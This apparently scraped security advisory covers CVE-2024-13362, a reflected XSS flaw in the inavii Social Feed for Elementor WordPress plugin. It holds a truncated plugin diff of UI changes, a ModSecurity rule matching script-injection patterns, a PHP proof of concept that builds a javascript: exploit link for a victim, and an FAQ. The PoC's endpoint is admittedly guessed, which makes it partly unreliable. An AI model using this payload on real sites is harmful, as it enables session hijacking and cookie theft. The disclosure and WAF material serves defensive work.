+            'load_more_button_content_info',
+            [
+                'type' => Controls_Manager::ALERT,
+                'alert_type' => 'info',
+                'content' => esc_html__( 'The number of posts to be loaded can be changed globally in', 'inavii-social-feed-e' ) .
+                    ' <a href="./admin.php?page=inavii-instagram-settings#/global-settings">' .
+                    esc_html__( 'Global Settings » Max number of posts imported per account', 'inavii-social-feed-e' ) .
+                    '</a>.',
+                'condition' => [
+                    'enable_load_more_button' => 'yes',
+                ],
+            ]
+        );
+
+        $widget->add_control(
+            'tab_load_more_box_note',
+            [
+                'type' => Controls_Manager::RAW_HTML,
+                'raw' => self::premiumInfo(),
+                'classes' => self::buttonClassGetPro(),
+            ]
+        );
+
+        $widget->end_controls_tab();
+
+        $widget->end_controls_tabs();
+
         $widget->end_controls_section();
     }
 }
 No newline at end of file
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/SectionFooterBoxStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/SectionFooterBoxStyle.php
@@ -17,9 +17,25 @@
                 'label' => __('Footer Box', 'inavii-social-feed-e'),
                 'classes' => self::titleIconClass() . ' inavii-pro__title-icon-footer',
                 'tab' => Controls_Manager::TAB_STYLE,
-                'condition' => array(
-                    'enable_follow_button' => 'yes',
-                ),
+                'conditions' => [
+                    'terms' => [
+                        [
+                            'relation' => 'or',
+                            'terms' => [
+                                [
+                                    'name' => 'enable_follow_button',
+                                    'operator' => '===',
+                                    'value' => 'yes',
+                                ],
+                                [
+                                    'name' => 'enable_load_more_button',
+                                    'operator' => '===',
+                                    'value' => 'yes',
+                                ],
+                            ],
+                        ],
+                    ],
+                ],
             )
         );

@@ -41,10 +57,44 @@
                         'title' => __('Right', 'inavii-social-feed-e'),
                         'icon' => 'eicon-h-align-right',
                     ),
+                    'space-between' => array(
+                        'title' => __('Space Between', 'inavii-social-feed-e'),
+                        'icon' => 'eicon-h-align-stretch',
+                    ),
                 ),
                 'default' => 'center',
                 'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__box' => 'justify-content: {{VALUE}};',
+                    '{{WRAPPER}} .inavii-button__box' => 'justify-content: {{VALUE}}; align-items: {{VALUE}};',
+                ),
+            )
+        );
+
+        $widget->add_responsive_control(
+            'button_box_direction',
+            array(
+                'label' => __('Direction', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::CHOOSE,
+                'options' => array(
+                    'row' => array(
+                        'title' => __('Row - horizontal', 'inavii-social-feed-e'),
+                        'icon' => 'eicon-arrow-right',
+                    ),
+                    'column' => array(
+                        'title' => __('Column - vertical', 'inavii-social-feed-e'),
+                        'icon' => 'eicon-arrow-down',
+                    ),
+                    'row-reverse' => array(
+                        'title' => __('Row - reversed', 'inavii-social-feed-e'),
+                        'icon' => 'eicon-arrow-left',
+                    ),
+                    'column-reverse' => array(
+                        'title' => __('Column - reversed', 'inavii-social-feed-e'),
+                        'icon' => 'eicon-arrow-up',
+                    ),
+                ),
+                'default' => 'row',
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__box' => 'flex-direction: {{VALUE}};',
                 ),
             )
         );
@@ -61,14 +111,18 @@
             )
         );

-        $widget->add_responsive_control(
-            'box_buttons_padding',
+        $widget->add_control(
+            'load_more_box_gap',
             array(
-                'label' => __('Padding', 'inavii-social-feed-e'),
-                'type' => Controls_Manager::DIMENSIONS,
-                'size_units' => array('px', 'em', '%'),
+                'label' => __('Gap', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SLIDER,
+                'range' => array(
+                    'px' => array(
+                        'max' => 100,
+                    ),
+                ),
                 'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__box' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+                    '{{WRAPPER}} .inavii-button__box' => 'gap: {{SIZE}}{{UNIT}};',
                 ),
             )
         );
@@ -80,10 +134,47 @@
             ]
         );

+        $widget->start_controls_tabs(
+            'section_style_footer_box_tabs'
+        );
+
+        $widget->start_controls_tab(
+            'section_style_footer_box_tab_follow_button',
+            [
+                'label' => esc_html__('Follow Button', 'inavii-social-feed-e'),
+            ]
+        );
+
         TabFollowButtonStyle::add($widget);
         TabNormalStyle::add($widget);
         TabHoverStyle::add($widget);

+        $widget->end_controls_tab();
+
+        $widget->start_controls_tab(
+            'section_style_footer_box_tab_load_more',
+            [
+                'label' => esc_html__('Load More', 'inavii-social-feed-e'),
+                'conditions' => array(
+                    'terms' => array(
+                        array(
+                            'name' => 'feeds_layout',
+                            'operator' => '!in',
+                            'value' => array_values($widget->sliderCondition),
+                        ),
+                    ),
+                ),
+            ]
+        );
+
+        TabLoadMoreStyle::add($widget);
+        TabLoadMoreNormalStyle::add($widget);
+        TabLoadMoreHoverStyle::add($widget);
+
+        $widget->end_controls_tab();
+
+        $widget->end_controls_tabs();
+
         $widget->end_controls_section();
     }
 }
 No newline at end of file
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabFollowButtonStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabFollowButtonStyle.php
@@ -18,7 +18,7 @@
                 [
                     'type' => Controls_Manager::ALERT,
                     'alert_type' => 'info',
-                    'heading' => esc_html__( 'Follow Button', 'inavii-social-feed-e' ),
+                    'heading' => esc_html__( 'Follow Button General', 'inavii-social-feed-e' ),
                 ]
             );
         }
@@ -33,18 +33,6 @@
         );

         $widget->add_responsive_control(
-            'follow_button_margin',
-            array(
-                'label' => __('Margin', 'inavii-social-feed-e'),
-                'type' => Controls_Manager::DIMENSIONS,
-                'size_units' => array('px', 'em', '%'),
-                'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__follow-instagram-button:not(.inavii__header)' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
-                ),
-            )
-        );
-
-        $widget->add_responsive_control(
             'follow_button_padding',
             array(
                 'label' => __('Padding', 'inavii-social-feed-e'),
@@ -69,6 +57,22 @@
         );

         $widget->add_control(
+            'follow_text_spacing',
+            array(
+                'label' => __('Text spacing', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SLIDER,
+                'range' => array(
+                    'px' => array(
+                        'max' => 100,
+                    ),
+                ),
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__follow-instagram-button:not(.inavii__header)' => 'gap: {{SIZE}}{{UNIT}};',
+                ),
+            )
+        );
+
+        $widget->add_control(
             'tab_info_footer_follow_button_icon_hr_style',
             [
                 'type' => Controls_Manager::DIVIDER,
@@ -128,26 +132,6 @@
         );

         $widget->add_control(
-            'follow_text_spacing',
-            array(
-                'label' => __('Text spacing', 'inavii-social-feed-e'),
-                'type' => Controls_Manager::SLIDER,
-                'range' => array(
-                    'px' => array(
-                        'max' => 100,
-                    ),
-                ),
-                'default' => array(
-                    'size' => 5,
-                    'unit' => 'px',
-                ),
-                'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__follow-instagram-button:not(.inavii__header) .inavii-button__text' => 'margin-right: {{SIZE}}{{UNIT}};',
-                ),
-            )
-        );
-
-        $widget->add_control(
             'follow_footer_icon_color_hover',
             array(
                 'label' => __('Icon Color Hover', 'inavii-social-feed-e'),
@@ -156,9 +140,6 @@
                     '{{WRAPPER}} .inavii-button__follow-instagram-button:not(.inavii__header):hover span i:before' => 'color: {{VALUE}};',
                     '{{WRAPPER}} .inavii-button__follow-instagram-button:not(.inavii__header):hover span svg *' => 'fill: {{VALUE}}!important;',
                 ),
-                'condition' => array(
-                    'enable_header_follow_button' => 'yes',
-                ),
             )
         );

--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabLoadMoreHoverStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabLoadMoreHoverStyle.php
@@ -0,0 +1,71 @@
+<?php
+
+namespace InaviiInstagramIncludesIntegrationWidgetsControlsFooterBoxStyle;
+
+use ElementorControls_Manager;
+use ElementorGroup_Control_Border;
+use ElementorGroup_Control_Box_Shadow;
+use InaviiInstagramIncludesIntegrationVersionedFeaturesTrait;
+
+class TabLoadMoreHoverStyle
+{
+    use VersionedFeaturesTrait;
+
+    public static function add($widget): void
+    {
+        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
+            $widget->add_control(
+                'tab_info_footer_load_more_hover_style',
+                [
+                    'type' => Controls_Manager::ALERT,
+                    'alert_type' => 'info',
+                    'heading' => esc_html__( 'Load More Hover', 'inavii-social-feed-e' ),
+                ]
+            );
+        }
+
+        $widget->add_group_control(
+            Group_Control_Box_Shadow::get_type(),
+            array(
+                'name' => 'load_more_box_shadow_hover',
+                'selector' => '{{WRAPPER}} .inavii-button__load-more-button:hover',
+            )
+        );
+
+        $widget->add_control(
+            'load_more_color_hover',
+            array(
+                'label' => __('Text Color', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::COLOR,
+                'default' => '',
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more-button:hover .inavii-button__text' => 'color: {{VALUE}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_background_hover',
+            array(
+                'label' => __('Background Color', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::COLOR,
+                'default' => '',
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more-button:hover' => 'background-color: {{VALUE}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_group_control(
+            Group_Control_Border::get_type(),
+            array(
+                'name' => 'load_more_border_hover',
+                'selector' => '{{WRAPPER}} .inavii-button__load-more-button:hover',
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+    }
+}
 No newline at end of file
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabLoadMoreNormalStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabLoadMoreNormalStyle.php
@@ -0,0 +1,76 @@
+<?php
+
+namespace InaviiInstagramIncludesIntegrationWidgetsControlsFooterBoxStyle;
+
+use ElementorControls_Manager;
+use ElementorGroup_Control_Border;
+use ElementorGroup_Control_Box_Shadow;
+use InaviiInstagramIncludesIntegrationVersionedFeaturesTrait;
+
+class TabLoadMoreNormalStyle
+{
+    use VersionedFeaturesTrait;
+
+    public static function add($widget): void
+    {
+        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
+            $widget->add_control(
+                'tab_info_footer_load_more_normal_style',
+                [
+                    'type' => Controls_Manager::ALERT,
+                    'alert_type' => 'info',
+                    'heading' => esc_html__( 'Load More Normal', 'inavii-social-feed-e' ),
+                ]
+            );
+        }
+
+        $widget->add_group_control(
+            Group_Control_Box_Shadow::get_type(),
+            array(
+                'name' => 'load_more_box_shadow_normal',
+                'selector' => '{{WRAPPER}} .inavii-button__load-more-button',
+            )
+        );
+
+        $widget->add_control(
+            'load_more_color_normal',
+            array(
+                'label' => __('Text Color', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::COLOR,
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more-button .inavii-button__text' => 'color: {{VALUE}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_background_normal',
+            array(
+                'label' => __('Background Color', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::COLOR,
+                'default' => '',
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more-button' => 'background-color: {{VALUE}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_group_control(
+            Group_Control_Border::get_type(),
+            array(
+                'name' => 'load_more_border_normal',
+                'selector' => '{{WRAPPER}} .inavii-button__load-more-button',
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'tab_info_footer_load_more_normal_hr_style',
+            [
+                'type' => Controls_Manager::DIVIDER,
+            ]
+        );
+    }
+}
 No newline at end of file
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabLoadMoreStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/FooterBox/Style/TabLoadMoreStyle.php
@@ -0,0 +1,150 @@
+<?php
+
+namespace InaviiInstagramIncludesIntegrationWidgetsControlsFooterBoxStyle;
+
+use ElementorControls_Manager;
+use ElementorGroup_Control_Typography;
+use InaviiInstagramIncludesIntegrationVersionedFeaturesTrait;
+
+class TabLoadMoreStyle
+{
+    use VersionedFeaturesTrait;
+
+    public static function add($widget): void
+    {
+        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
+            $widget->add_control(
+                'tab_info_footer_load_more_style',
+                [
+                    'type' => Controls_Manager::ALERT,
+                    'alert_type' => 'info',
+                    'heading' => esc_html__( 'Load More General', 'inavii-social-feed-e' ),
+                    'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+                ]
+            );
+        }
+
+        $widget->add_group_control(
+            Group_Control_Typography::get_type(),
+            array(
+                'name' => 'load_more_typography',
+                'label' => __('Typography', 'inavii-social-feed-e'),
+                'selector' => '{{WRAPPER}} .inavii-button__load-more-button',
+            )
+        );
+
+        $widget->add_responsive_control(
+            'load_more_padding',
+            array(
+                'label' => __('Padding', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::DIMENSIONS,
+                'size_units' => array('px', 'em', '%'),
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more-button' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+                ),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_border_radius',
+            array(
+                'label' => __('Border Radius', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::DIMENSIONS,
+                'size_units' => array('px', '%'),
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more-button' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_text_spacing',
+            array(
+                'label' => __('Text spacing', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SLIDER,
+                'range' => array(
+                    'px' => array(
+                        'max' => 100,
+                    ),
+                ),
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more .inavii-button__text' => 'gap: {{SIZE}}{{UNIT}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'tab_info_footer_load_more_icon_hr_style',
+            [
+                'type' => Controls_Manager::DIVIDER,
+            ]
+        );
+
+        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
+            $widget->add_control(
+                'tab_info_footer_load_more_icon_style',
+                [
+                    'type' => Controls_Manager::ALERT,
+                    'alert_type' => 'info',
+                    'heading' => esc_html__( 'Loader', 'inavii-social-feed-e' ),
+                    'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+                ]
+            );
+        }
+
+        $widget->add_control(
+            'load_more_icon_color',
+            array(
+                'label' => __('Loader Color', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::COLOR,
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more .inavii-button__text::after' => 'border-color: {{VALUE}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_icon_size',
+            array(
+                'label' => __('Loader Size', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SLIDER,
+                'range' => array(
+                    'px' => array(
+                        'max' => 100,
+                    ),
+                ),
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more .inavii-button__text::after' => 'height: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'load_more_icon_weight',
+            array(
+                'label' => __('Loader Weight', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SLIDER,
+                'range' => array(
+                    'px' => array(
+                        'max' => 10,
+                    ),
+                ),
+                'selectors' => array(
+                    '{{WRAPPER}} .inavii-button__load-more .inavii-button__text::after' => 'border-width: {{SIZE}}{{UNIT}};',
+                ),
+                'classes' => self::titleLabelProClass() . ' ' . self::optionProClass(),
+            )
+        );
+
+        $widget->add_control(
+            'tab_info_footer_load_more_icon_bottom_hr_style',
+            [
+                'type' => Controls_Manager::DIVIDER,
+            ]
+        );
+    }
+}
 No newline at end of file
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/HeaderBox/Style/SectionHeaderBoxStyle.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/HeaderBox/Style/SectionHeaderBoxStyle.php
@@ -337,13 +337,13 @@
         );

         $widget->add_responsive_control(
-            'follow_button_header_margin',
+            'follow_button_header_padding',
             array(
-                'label' => __('Margin', 'inavii-social-feed-e'),
+                'label' => __('Padding', 'inavii-social-feed-e'),
                 'type' => Controls_Manager::DIMENSIONS,
                 'size_units' => array('px', 'em', '%'),
                 'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
                 ),
                 'condition' => array(
                     'enable_header_follow_button' => 'yes',
@@ -351,14 +351,14 @@
             )
         );

-        $widget->add_responsive_control(
-            'follow_button_header_padding',
+        $widget->add_control(
+            'follow_button_header_border_radius',
             array(
-                'label' => __('Padding', 'inavii-social-feed-e'),
+                'label' => __('Border Radius', 'inavii-social-feed-e'),
                 'type' => Controls_Manager::DIMENSIONS,
-                'size_units' => array('px', 'em', '%'),
+                'size_units' => array('px', '%'),
                 'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
                 ),
                 'condition' => array(
                     'enable_header_follow_button' => 'yes',
@@ -367,13 +367,17 @@
         );

         $widget->add_control(
-            'follow_button_header_border_radius',
+            'follow_header_text_spacing',
             array(
-                'label' => __('Border Radius', 'inavii-social-feed-e'),
-                'type' => Controls_Manager::DIMENSIONS,
-                'size_units' => array('px', '%'),
+                'label' => __('Text spacing', 'inavii-social-feed-e'),
+                'type' => Controls_Manager::SLIDER,
+                'range' => array(
+                    'px' => array(
+                        'max' => 100,
+                    ),
+                ),
                 'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header' => 'gap: {{SIZE}}{{UNIT}};',
                 ),
                 'condition' => array(
                     'enable_header_follow_button' => 'yes',
@@ -587,29 +591,6 @@
                 ),
                 'condition' => array(
                     'enable_header_follow_button' => 'yes',
-                ),
-            )
-        );
-
-        $widget->add_control(
-            'follow_header_text_spacing',
-            array(
-                'label' => __('Text spacing', 'inavii-social-feed-e'),
-                'type' => Controls_Manager::SLIDER,
-                'range' => array(
-                    'px' => array(
-                        'max' => 100,
-                    ),
-                ),
-                'default' => array(
-                    'size' => 5,
-                    'unit' => 'px',
-                ),
-                'selectors' => array(
-                    '{{WRAPPER}} .inavii-button__follow-instagram-button.inavii__header .inavii-button__text' => 'margin-right: {{SIZE}}{{UNIT}};',
-                ),
-                'condition' => array(
-                    'enable_header_follow_button' => 'yes',
                 ),
             )
         );
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/LikeComments/Content/TabBox.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/LikeComments/Content/TabBox.php
@@ -45,20 +45,6 @@
             )
         );

-        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
-            $widget->add_control(
-                'likes_switch_info',
-                [
-                    'type' => Controls_Manager::ALERT,
-                    'alert_type' => 'info',
-                    'heading' => esc_html__( 'This option only works with a business Instagram account.', 'inavii-social-feed-e' ),
-                    'condition' => array(
-                        'likes_switch' => 'yes',
-                    ),
-                ]
-            );
-        }
-
         $widget->add_control(
             'comments_switch',
             array(
@@ -72,20 +58,6 @@
             )
         );

-        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
-            $widget->add_control(
-                'comments_switch_info',
-                [
-                    'type' => Controls_Manager::ALERT,
-                    'alert_type' => 'info',
-                    'heading' => esc_html__( 'This option only works with a business Instagram account.', 'inavii-social-feed-e' ),
-                    'condition' => array(
-                        'comments_switch' => 'yes',
-                    ),
-                ]
-            );
-        }
-
         $widget->add_control(
             'section_content_box_note',
             [
--- a/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/LikeComments/Content/TabLightBox.php
+++ b/inavii-social-feed-for-elementor/includes/Integration/Widgets/Controls/LikeComments/Content/TabLightBox.php
@@ -75,20 +75,6 @@
             )
         );

-        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
-            $widget->add_control(
-                'tab_info_box_likes_comments_style',
-                [
-                    'type' => Controls_Manager::ALERT,
-                    'alert_type' => 'info',
-                    'heading' => esc_html__( 'This option only works with a business Instagram account.', 'inavii-social-feed-e' ),
-                    'condition' => array(
-                        'likes_lightbox_switch' => 'yes',
-                    ),
-                ]
-            );
-        }
-
         $widget->add_control(
             'comments_lightbox_switch',
             array(
@@ -102,20 +88,6 @@
             )
         );

-        if (version_compare(ELEMENTOR_VERSION, '3.19.0', '>')) {
-            $widget->add_control(
-                'tab_info_box_comments_style',
-                [
-                    'type' => Controls_Manager::ALERT,
-                    'alert_type' => 'info',
-                    'heading' => esc_html__( 'This option only works with a business Instagram account.', 'inavii-social-feed-e' ),
-                    'condition' => array(
-                        'comments_lightbox_switch' => 'yes',
-                    ),
-                ]
-            );
-        }
-
         $widget->add_control(
             'tab_lig

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@rx /?.*fs_plugin=[a-z_-]+&url=" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'Atomic Edge WAF Rule - CVE-2024-13362',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
SecRule ARGS_GET:url "@rx (?:javascript:|<script|onerror=|onload=)" 
  "t:urlDecode,t:lowercase,chain"
SecRule ARGS_GET:fs_plugin "@rx ^[a-z_-]+$" 
  "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

/*
This PoC demonstrates the reflected XSS vulnerability by crafting a URL with a malicious 'url' parameter.
When the victim clicks this link, the injected script executes in their browser.
*/

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site
$malicious_payload = 'javascript:alert("XSS")'; // Simple proof payload, can be obfuscated

// Construct the exploit URL
// The exact endpoint may vary; common Freemius endpoints include /?fs_plugin=...&url=...
$exploit_url = $target_url . '/?fs_plugin=inavii-social-feed&url=' . urlencode($malicious_payload);

echo "[+] CVE-2024-13362 Exploit PoCn";
echo "[+] Target: $target_urln";
echo "[+] Exploit URL: $exploit_urln";
echo "[+] Send this link to the victim to trigger XSS.n";

// Optional: Verify if target is vulnerable by checking response for reflected payload
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && strpos($response, $malicious_payload) !== false) {
    echo "[+] Target appears VULNERABLE: Payload reflected in response.n";
} else {
    echo "[-] Target may not be vulnerable or payload not reflected. Response code: $http_coden";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the Freemius framework used in various WordPress plugins, including inavii-social-feed-for-elementor. It allows unauthenticated attackers to inject and execute arbitrary web scripts via the ‘url’ parameter due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when user input from the ‘url’ parameter is processed without proper validation or escaping. Attackers can craft a malicious link that, when clicked by a user, executes the injected script in the context of the victim’s browser, potentially leading to session hijacking or data theft.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the inavii-social-feed-for-elementor plugin version 2.7.0 or earlier is at risk. Site administrators should check their installed plugin versions to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the inavii-social-feed-for-elementor plugin in your WordPress admin panel. If it is version 2.7.0 or earlier, your site is vulnerable to CVE-2024-13362.
What should I do to fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the inavii-social-feed-for-elementor plugin to version 2.7.7 or later, where the issue is patched. Regularly updating all plugins and themes is essential for maintaining site security.
What does the CVSS score of 6.1 mean?
Understanding the severity rating
The CVSS score of 6.1 indicates a medium severity level for CVE-2024-13362. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to serious consequences if exploited.
What are the practical risks of this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, cookie theft, and unauthorized actions on the site. This can compromise user accounts and sensitive data.
How does the proof of concept demonstrate the vulnerability?
Explanation of the PoC
The proof of concept outlines how an attacker can craft a URL with a malicious ‘url’ parameter that triggers the XSS vulnerability. By clicking the link, the injected script executes in the user’s browser, demonstrating the risk of the vulnerability.
What are the common endpoints affected by this vulnerability?
Identifying vulnerable scripts
Common endpoints that may be affected include those handling the ‘url’ parameter, such as ‘fs_connect’ and ‘fs_checkout’. These endpoints process user input directly, making them susceptible to XSS attacks.
Is there a specific patch for the XSS vulnerability?
Details on the fix
The patch for CVE-2024-13362 is included in version 2.7.7 of the inavii-social-feed-for-elementor plugin. While the patch addresses related functionality, the specific mitigation for the XSS vulnerability involves sanitizing the ‘url’ parameter.
What should I do if I cannot update the plugin immediately?
Interim mitigation strategies
If immediate updating is not possible, consider disabling the affected plugin until a secure version can be installed. Additionally, monitor user activity and educate users about the risks of clicking unknown links.
Where can I find more information about this vulnerability?
Further resources
For more detailed information, refer to the official CVE database, security advisories from the plugin developers, or security-focused websites that track vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations